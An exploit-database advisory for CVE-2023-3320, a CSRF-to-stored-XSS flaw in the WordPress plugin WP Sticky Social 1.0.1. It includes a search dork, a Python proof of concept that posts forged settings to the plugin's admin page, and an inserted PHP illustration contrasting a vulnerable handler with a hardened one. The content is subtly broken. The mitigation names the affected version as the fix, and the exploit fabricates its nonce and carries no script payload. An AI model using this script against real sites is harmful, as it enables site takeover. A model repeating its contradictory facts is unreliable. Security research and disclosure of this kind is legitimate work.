Vendor: WP Sticky Social
By: Amirhossein Bahramizadeh
CVSS: 8.8 (HIGH)
Vulnerability: Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS)
CWE: 79
Product Name: WP Sticky Social
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: YES
CVE: CVE-2023-3320
CPE: a:wp_sticky_social_project:wp_sticky_social:1.0.1
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
Year: 2023

WP Sticky Social 1.0.1 – Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)

The WP Sticky Social plugin version 1.0.1 is vulnerable to Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS) attacks. An attacker can exploit this vulnerability to perform malicious actions on behalf of an authenticated user and inject arbitrary script code into the affected site.

Mitigation:

Update to the latest version of the WP Sticky Social plugin (1.0.1), or remove the plugin if it is not needed. Ensure that all plugins and themes used in WordPress are regularly updated to prevent security vulnerabilities.
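The following is an added illustration of the bug class behind this advisory, not the plugin's own code: a hypothetical WordPress settings handler that saves a POSTed value with no nonce or capability check (so a forged cross-site POST from a logged-in admin persists attacker-chosen markup), next to the hardened form that verifies the action-bound nonce, checks the capability, sanitizes on input and escapes on output. Option, action and field names are assumed for the example.

```php
<?php
// Hypothetical handler illustrating the CSRF -> stored XSS pattern; not the
// WP Sticky Social plugin's real code. Option/nonce/field names are assumed.

// Vulnerable pattern: no nonce check, no capability check, raw value stored.
// Any site the admin visits can submit this form from their browser, and the
// stored value is later rendered into the settings page.
function wpss_example_save_settings_vulnerable() {
    if ( isset( $_POST['wpss_setting_1'] ) ) {
        update_option( 'wpss_example_setting_1', $_POST['wpss_setting_1'] );
    }
}

// Hardened pattern: a forged cross-site request cannot know the action-bound
// nonce, so check_admin_referer() rejects it (dies with 403) before anything
// is stored; the capability check stops low-privilege users; sanitization
// strips tags before the value reaches the database.
function wpss_example_save_settings_hardened() {
    if ( ! isset( $_POST['wpss_setting_1'] ) ) {
        return;
    }
    check_admin_referer( 'wpss_example_save_settings', 'wpss_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    $value = sanitize_text_field( wp_unslash( $_POST['wpss_setting_1'] ) );
    update_option( 'wpss_example_setting_1', $value );
}

// The settings form emits the nonce field the hardened handler verifies and
// escapes the stored value on output, so it renders as text rather than markup.
function wpss_example_render_form() {
    $value = get_option( 'wpss_example_setting_1', '' );
    echo '<form method="post">';
    wp_nonce_field( 'wpss_example_save_settings', 'wpss_nonce' );
    echo '<input type="text" name="wpss_setting_1" value="' . esc_attr( $value ) . '">';
    submit_button();
    echo '</form>';
}
```

Note that the PoC below fabricates its "wpss_nonce" from a SHA-256 of the current time; against the hardened handler that value fails wp_verify_nonce() inside check_admin_referer() and the request is refused.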

Exploit-DB raw data:

# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
#  Dork: inurl:~/admin/views/admin.php
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
# Version: 1.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-3320

import requests
import hashlib
import time

# Set the target URL
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"

# Set the user agent string
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

# Generate the nonce value
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()

# Set the data payload
payload = {
    "wpss_nonce": nonce,
    "wpss_setting_1": "value_1",
    "wpss_setting_2": "value_2",
    # Add additional settings as needed
}

# Set the request headers
headers = {
    "User-Agent": user_agent,
    "Referer": url,
    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
    # Add additional headers as needed
}

# Send the POST request
response = requests.post(url, data=payload, headers=headers)

# Check the response status code
if response.status_code == 200:
    print("Request successful")
else:
    print("Request failed")